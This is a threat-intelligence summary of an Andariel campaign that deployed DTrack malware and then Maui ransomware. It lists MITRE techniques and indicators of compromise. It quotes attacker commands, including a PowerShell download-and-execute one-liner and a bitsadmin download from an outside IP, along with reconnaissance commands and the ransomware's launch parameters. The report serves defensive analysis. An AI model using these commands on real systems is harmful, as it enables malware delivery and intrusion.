Threat Research

Andariel deploys DTrack and Maui ransomware

Securonix

Two sentences summarizing: This analysis confirms a Maui ransomware incident in 2022 attributed to Andariel, who deployed a DTrack variant about ten hours earlier on the same target. The operation appears global in scope, with a Japanese victim and overlaps to India, Vietnam, and Russia, and attribution is offered with low-to-medium confidence. #Andariel #MauiRansomware

Keypoints

  • Timeline indicates 3Proxy tool (2020-12-25) followed by DTrack and then Maui (April 2021) on the same target, with Japan as a confirmed victim.
  • DTrack malware executes an embedded shellcode, then runs Windows commands to collect host information (ipconfig, tasklist, netstat, netsh, ping) and transmits data to a remote host.
  • A new information-gathering module of DTrack sends stolen data to a remote server over HTTP and can copy stolen files to the remote host on the same network.
  • Maui ransomware is launched with command-line parameters (-t 8 -x E:) and encrypts a drive, aided by RSA key components stored on the target (Maui.evd and Maui.key).
  • Additional DTrack modules and initial infection methods include 3Proxy deployment, an HTTP server chain (HFS), and a PowerShell-based dropper fetched from a remote host.
  • Victims include a Japanese housing company (April 15, 2021) and other victims in India, Vietnam, and Russia; the actor appears opportunistic, targeting exposed public services like WebLogic and HFS, and uses DTrack as the main payload.
  • Attribution connects DTrack/Preft-like code with Andariel (Stonefly/Silent Chollima), with high code similarity to prior DTrack variants and connections to Backdoor.Preft in Symantec reports.

MITRE Techniques

  • [T1059.001] PowerShell – Use of Windows PowerShell to download and execute a remote script. Quote: “C:windowssystem32WindowsPowershellv1.0powershell.exe IEX (New-Object Net.WebClient).DownloadString(‘hxxp://145.232.235[.]222/usr/users/mini.ps1’)”
  • [T1197] Bits – Use of Bitsadmin to download and run additional payloads. Quote: “bitsadmin.exe /transfer myJob /download /priority high ‘hxxp://145.232.235[.]222/usr/users/dwem.cert’ “%appdata%microsoftmmcdwem.cert””
  • [T1090] Proxy – Using legitimate proxy and tunneling tools to maintain access. Quote: “Using legitimate proxy and tunneling tools after initial infection or deploying them to maintain access.”
  • [T1190] Exploit Public-Facing Application – Compromise of exposed services (WebLogic) via CVE-2017-10271. Quote: “The actor compromised this server via the CVE-2017-10271 exploit.”
  • [T1486] Data Encrypted for Impact – Maui ransomware encryption using RSA keys and drive selection. Quote: “RSA private key C:WindowsTemptempbinMaui.evd” and “RSA public key C:WindowsTemptempbinMaui.key” and “C:WindowsTemptempbinMaui.exe” with “-t 8 -x E:”
  • [T1041] Exfiltration Over C2 Channel – Data exfiltration to a remote host over HTTP. Quote: “the new information-gathering module sends stolen information to a remote server over HTTP” and “copies stolen files to the remote host on the same network.”
  • [T1057] Process Discovery – Enumerating running processes with tasklist. Quote: “C:Windowssystem32cmd.exe” /c tasklist > “%Temp%temptask.list””
  • [T1016] System Network Configuration Discovery – Collecting network configuration via ipconfig and netsh. Quote: “”C:Windowssystem32cmd.exe” /c ipconfig /all” and “”C:Windowssystem32cmd.exe” /c netsh interface show interface”

Indicators of Compromise

  • [MD5] – Example values observed – 739812e2ae1327a94e441719b885bd19, f2f787868a3064407d79173ac5fc0864, and 2 more hashes (DTrack variants)
  • [SHA1] – Example values observed – 102a6954a16e80de814bee7ae2b893f1fa196613, 94db86c214f4ab401e84ad26bb0c246059daff, and 2 more hashes
  • [SHA256] – Example values observed – 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67, a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa, and 2 more hashes
  • [File name] – Maui ransomware binary and related components – “C:WindowsTemptempmaui.exe” and “C:WindowsTemptempbinMaui.evd” and “C:WindowsTemptempbinMaui.key” (RSA keys); DTrack module binaries such as “C:WindowsTemptempmvhost.exe”
  • [IP Address] – Example observed IP used for command and control/downloads – 145.232.235.222
  • [URL/HTTP] – Remote script and payload delivery endpoints – hxxp://145.232.235[.]222/usr/users/mini.ps1, hxxp://145.232.235[.]222/usr/users/dwem.cert

Read more: https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint